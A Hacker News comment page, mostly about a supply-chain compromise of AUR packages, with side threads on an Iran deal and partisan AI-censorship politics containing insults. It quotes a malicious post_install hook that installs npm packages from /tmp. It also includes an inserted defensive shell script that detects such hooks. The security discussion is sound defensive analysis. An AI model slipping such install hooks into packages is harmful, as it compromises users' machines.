Hacker News | no-name-here's comments

I can see the logic in what you’re saying, but Iran state media is reporting the deal includes “The US and its allies delivering reconstruction plans for Iran worth at least $300bn” (in addition to the $25B) but I don’t understand their use of the word “plan”? https://www.bbc.com/news/live/cj0grpyg4v1t?post=asset%3A1793...

That has been kicking around in the deal discussions since the end of May, yeah. Nothing much about this MoU seems to have really changed since then:

https://www.timesofisrael.com/liveblog_entry/emerging-us-ira...

https://www.yahoo.com/news/politics/articles/iran-could-rece...

Two diplomats briefed on the latest draft called it “an international ‘investment fund,’ which the United States would help facilitate in the event of a final deal,” and plans for which would be discussed during the initial 60-day negotiations period that the memorandum would kick off, the report says.

It appears to concern the authorisation of a sort of Marshall Plan inward investment fund that may end up holding that sort of amount of cash that the US effectively agrees to facilitate and allow.

But I guess a key thing is that it involves the USA agreeing not to seize it. It would also implicitly allow businesses to do the reconstruction work without being sanctioned.


Under a JCPOA extension, why would items like access to the global oil markets (in addition to sanctions) not be part of the negotiations?

And with JCPOA and its possible continuation, that was a joint agreement among a number of countries - in the current situation, it’s just the U.S./Israel (+ them trying to impose their will on other countries to go along with any carrots/sticks).


Are you suggesting like <package-name>.packaged-by.joe-Schmoe ? And then if Joe Schmoe abandons it, people should instead switch to <package-name>.packaged-by.Abe-Lincoln etc?

I mean we can talk about the actual naming scheme but essentially yes.

It is also an explicit signal of someone different taking over the ownership.


But for your IG example, isn’t that probably because although most people may claim they want to see everyday moments from friends, people in real life actually click more on the “thirst traps” etc?

It is, but I don't think you can infer a revealed preference from that. It's perfectly consistent for someone to want to avoid thirst traps because they know they're too inclined to click.

The Chinese models are censored (too?).

> US is censoring models

For the current Anthropic issue, I’d say that’s more likely to just be generic corruption, revenge, shakedown, and/or incompetence from the Trump admin. ‘Censoring’ might be technically correct, but I think one of the aforementioned verbs is a better fit.


> The Chinese models are censored (too?).

This is MUCH less of an issue if they're providing the weights though.

They can still be fine-tuned & ablated.


> corruption, revenge, shakedown, and/or incompetence

Sadly, I think it's all four at once.


Also, IPO prep work. The whole industry is speed running enshittification.

It’s not just the models. Try copy pasting stuff out of the claude app, or sharing a conversation. It’s completely broken now.


It feels like the difference is really just the competence level of the corrupt government.

It’s not like the American regime is anti-censorship but pro-shakedown.


china is doing political censorship on specific well known topics - their current government, corruption and workers rights, taiwan, tiananmen square, human rights in xinjiang, old communist leaders and a couple others. not defending them just to be clear. the rules are the same for everyone, if your model can't give you anti ccp views with normal prompting you are safe. they never tried to restrict access to a model that's already public for vague security reasons.

Tbh if we had a Harris admin I expect we'd have some sort of locking down by now.

Probably. But it would be at least somewhat thought-out and apply to all the AI providers. Not just the one currently disfavored by Captain Dipshit and the Sycophants.

I really don't know why business cozies up to Trump so much, given how unbelievably unreliable and mercurial he is about...everything.


Nobody thinks the leopards will eat THEIR faces, just their neighbors'.

Because he’s running a racket. If you don’t cozy up to Trump you will suffer and it’s as simple as that. This administration is a mafia.

Is the idea that instructions to make weapons, and learning about history are comparable?

Censorship is censorship.

Is it? Would bioweapon instruction restrictions be equivalent to disallowing reporting on whether the government is massacring large numbers of citizens in your city? Both are ‘censorship’ but don’t seem remotely equivalent to me.

That’s the thing about principled positions. If you believe censorship is wrong, then it is equally wrong no matter what the topic is.

Do you believe it’s only censorship where context shouldn’t be applied? Like if someone had a principled view "violence is wrong", would non-lethal violence in a clear case of self-defense be “equally wrong” as the guy who personally killed tens of thousands of captured POWs (Blokhin)? As “violence is violence”?

>> Would bioweapon instruction restrictions be equivalent to disallowing reporting on whether the government is massacring large numbers of citizens in your city?

> If you believe censorship is wrong, then it is equally wrong no matter what the topic is.

Are you agreeing with that view, or merely saying it’s a theoretical view but you think such believers are wrong?


I should think learning about history should lead to a desire for citizens to be able to quietly make weapons at home given the many documented cases of governments across the world mass murdering their own citizens (or foreign governments invading and genociding). What's the point of telling people the wrongs of their oppressors while simultaneously disempowering them from doing anything about it or preparing to defend themselves in the future?

So yes they're not just comparable, but two sides of the same coin.


The idea that Chinese citizens could’ve prevented the Tiananmen massacre with a bunch of home printed AK-47s is silly. The government had tanks. The same applies in the US.

Isn’t Trump’s Science and Technology Advisors Council pretty much entirely made up of Trump donors, rich investors, and/or cryptocurrency CEOs, whereas pretty much every other president included legitimate science and technology advisors on it? (I last checked 2 or 3 months ago.)

It could be the Trump admin incompetently attempting to help Trump’s primary benefactor? (As I haven’t yet seen anyone say that the current actions are a competent approach to AI regulation.)

What is the basis for that claim? There’s been lots of wild conjecture, but as The Guardian reported, “Almost none of this had any relationship to reality” and “LLMs-gone-rogue dominated coverage, but had nothing to do with the targeting.” https://www.theguardian.com/news/2026/mar/26/ai-got-the-blam...

> You have to review the source of every PKGBUILD from the AUR you install, full stop. Yes that includes any updates.

But isn’t that also the case for every browser extension, VSCode extension, nuget package, Cargo crate, python package, npm package, etc? (Unless you are running them somewhere without internet access or without access to anything you don’t mind being public?)

Maybe it’s not the case for aur, but the others could theoretically be improved with better permissions, sandboxing, etc. I guess browser extensions basically have those options, even if no “normal” users use them.

Unfortunately 99.99% of people can’t or don’t have the time to review everything. :-(

I guess distro packages where there are trusted maintainers, or places like the iOS App Store where there are both permissions and somewhat of a review process, are the safest.


> isn’t that also the case for every browser extension, VSCode extension, nuget package, Cargo crate, python package, npm package

Yes, and all of those have supply chain hacks in them, and have happened within the last year? In this specific case, it's a malicious npm package being installed with official npm tooling in the PKGBUILD.

The advantage to the AUR is just that you can reasonably review every PKGBUILD for what you're installing, they are very simple bash scripts. It'd be great if more people would donate resources to help verify and validate AUR scripts, but the AUR specifically exists for packages that the trusted users and devs of arch don't have time to personally maintain.


> The advantage to the AUR is just that you can reasonably review every PKGBUILD for what you're installing

Simply reviewing the PKGBUILD is not enough for the same reason reviewing a Makefile is not enough: You need to review the source code for _everything_ that is being downloaded and executed on your machine. For AUR packages, that means not just the PKGBUILD but the full source code for the program it is building and the full source code for any of its dependencies.

Hypothetical example: you wouldn't have caught the xzutils exploit by reading the PKGBUILD.


Right, the PKGBUILD only helps you review if you're installing what you intend to - not verifying if what you're installing contains any hacks.

This hack in particular added random npm packages that would have been unneeded/unintentional, and was visible in the PKGBUILDs directly.


No it wasn't? It ran npm install from post install script in another file. If they named it better people probably wouldn't have even noticed so quickly.

True, but looking at a compromised PKGBUILD[0], it looks like it is installing "atomic-lockfile" and "figures". I think 99% of people reading the PKGBUILD would assume those are legit dependencies needed by the program. It's not like it was running "npm install 1337hax0r". Which is why you need to read the source for both "atomic-lockfile" and "figures" (and literally everything else).

[0] https://aur.archlinux.org/cgit/aur.git/commit/?h=pass-cli&id...


It adds npm as a dependency, to a go build?

It changes the contributor email?

to install random npm packages?!

in /tmp?! in post_install()??! With a new random contributor email????

Archlinux is focused on enabling a specific type of user, and certainly ones that can read bash scripts, and understand reasonable dependencies vs unreasonable ones. And even then - this is specifically in the AUR and not a package the distro directly offers.


> It adds npm as a dependency, to a go build?

Programs often invoke other programs through the exec* family of syscalls. For example, git is written in C but it ships with perl dependencies. It is not unreasonable to assume pass-cli added a runtime dependency on a program written in javascript. Regardless, we're talking hundreds of AUR packages have been compromised, I'd be shocked if none of them were javascript-based programs. Perhaps pass-cli was simply a bad example for me to choose.

> It changes the contributor email?

I think this is the 2nd most sus change, but even so, I have changed email addresses over the years so it isn't completely unreasonable.

> in /tmp?!

And yes, this is the most sus change.


I'm not sure if you're trying to strawman or are inexperienced.

No, this in no way or shape looks like installing a legitimate dependency to the target audience (expert users). This is a package manager, you don't install dependencies via post_install.


Curious, in this specific case: if people DID review the PKGBUILD, what exactly would they recognize to spot these packages were compromised?

From the concrete example someone posted below, you'd see that a post-install hook exists, literally this line:

> install=toggldesktop-bin-deps.install

And the toggldesktop-bin-deps.install contains this:

> post_install() {{

> cd /tmp

> bun add axios uuid ora js-digest

> }}

Seeing any install hook download anything from the web should immediately raise alarms when reviewing, even before you checkout what packages it actually installs.


Exactly, these hacks really stand out to me, and used odd patterns (like .install files that just had 2-3 line post_install functions) etc.

Some things I try to check for

- sources array has sources that don't correlate to the package name/purpose or are from strange places, like github repos that don't seem relevant etc.

- extensive post install scripts suggesting it's doing a lot more than is normal

But those are very crude, I wonder if an AUR helper could optionally consult a local LLM to review a PKGBUILD before installing these days...
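The review checks described in the two comments above (a declared `install=` hook, and a hook that downloads or installs packages), written out as an added example; it is not from the thread and not an Arch or AUR-helper tool. The function names, the pattern lists and the two sample package directories are assumptions constructed here, with the "bad" hook modeled on the one quoted in the thread.

```shell
#!/bin/sh
# Added example: static check of an AUR package directory for install hooks
# that download or install code. Patterns are an assumed, crude heuristic.
FETCH_RE='(^|[^[:alnum:]_-])((npm|pnpm|yarn|bun|pip3?|gem|cargo)[[:space:]]+(install|add|i)|curl|wget|git[[:space:]]+clone)([^[:alnum:]_-]|$)'
TMP_RE='(^|[[:space:]"=])/(tmp|var/tmp|dev/shm)(/|[[:space:]"]|$)'

# Print the install= hook named in a PKGBUILD. Parsed with sed on purpose:
# sourcing a PKGBUILD just to read a variable would execute it.
hook_name() {
    sed -n "s/^[[:space:]]*install=[\"']\{0,1\}\([^\"'[:space:]]*\).*/\1/p" "$1" | head -n 1
}

# scan FILE REGEX REASON: print "file:line: reason: text" per matching line.
scan() {
    grep -nE -- "$2" "$1" | while IFS=: read -r n text; do
        printf '%s:%s: %s: %s\n' "${1##*/}" "$n" "$3" "$text"
    done
}

# Audit one package directory; prints nothing when no hook line is flagged.
audit_pkgdir() {
    hook=$(hook_name "$1/PKGBUILD")
    [ -n "$hook" ] || return 0                     # no install hook declared
    if [ ! -f "$1/$hook" ]; then
        echo "PKGBUILD: install hook '$hook' declared but not shipped"
        return 0
    fi
    scan "$1/$hook" "$FETCH_RE" "fetches code at install time"
    scan "$1/$hook" "$TMP_RE" "works in a world-writable temp dir"
}

count_findings() { audit_pkgdir "$1" | wc -l | tr -d ' '; }

# Constructed samples: "bad" is modeled on the hook quoted in the thread,
# "ok" is a hook that only prints a message. Package names are made up.
make_samples() {
    base=$(mktemp -d)
    mkdir "$base/bad" "$base/ok"
    printf '%s\n' 'pkgname=sample-bin' 'install=toggldesktop-bin-deps.install' > "$base/bad/PKGBUILD"
    printf '%s\n' 'post_install() {' '  cd /tmp' '  bun add axios uuid ora js-digest' '}' > "$base/bad/toggldesktop-bin-deps.install"
    printf '%s\n' 'pkgname=example' 'install=example.install' > "$base/ok/PKGBUILD"
    printf '%s\n' 'post_install() {' '  echo "Enable with: systemctl enable example"' '}' > "$base/ok/example.install"
    echo "$base"
}

samples=$(make_samples)
audit_pkgdir "$samples/bad"    # two findings
audit_pkgdir "$samples/ok"     # prints nothing
rm -rf "$samples"
```

A clean result only means the hook matches none of these patterns; it says nothing about the upstream source the package builds, which is the limit raised earlier in the thread.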


> like github repos that don't seem relevant

i wouldn't necessarily trust a repo that does seem relevant either. it's trivial to put any data you want at a url which, at a glance, appears to legitimately belong to any repo you can fork.


typically attacks happen when the URL for the source code or binary gets changed significantly... or like in this attack someone adds something to the post_install section which does something like add an npm install command. a lot of updates for binaries are just version bumps and SHA hashes changing which are easy to vet if you trust the source to not be compromised.

if someone set up a properly vetted LLM farm to donate local LLM resources, i'd give it ~8 hours a day on whatever model i have loaded.

Some of these have corporate backing and/or better funding and thus more manpower to review things, but yeah it essentially applies to all of them. It's no accident that there's news about a new npm package being compromised every other week.

Ultimately, the way we're doing permissions on the OS level is fundamentally broken on desktop OSes, and we're increasingly feeling the effects of that. Ideally everything should be sandboxed by default, and only given access to its own files, instead of everything the user has.

But we're a long way away from that, and that's not something a single project could enforce.


Apparently I was almost affected, but I don't update arch frequently enough, that my alvr package was not updated during the window.

It's also a good thing that Arch Linux has people hawking it, so if these things happen they get caught on insanely quickly. I wonder if there are sane ways to protect your dotfiles from rogue processes just touching them.


I normally exclude all AUR packages from system updates to speed things up, so I shouldn't be affected either.

I usually use "yay" for all my stuff, so I might have to consider telling yay to only update system files, apparently one way to decrease this type of attack is to get a hardware key for your SSH files, might finally have a reason to get a yubikey or similar.

Yes, use a distro with good security posture such as Debian to reduce risk.

Are the packages in the repositories of arch also affected?

No? Then it's not a problem.

Every device in this household that isn't a smartphone runs on Arch.

All my servers run on Arch.

Never had a problem, because I don't blindly install stuff from the AUR.


I guess official arch packages are also ok nowadays, my point was more that one should avoid non-curated repositories of packages such as cargo.
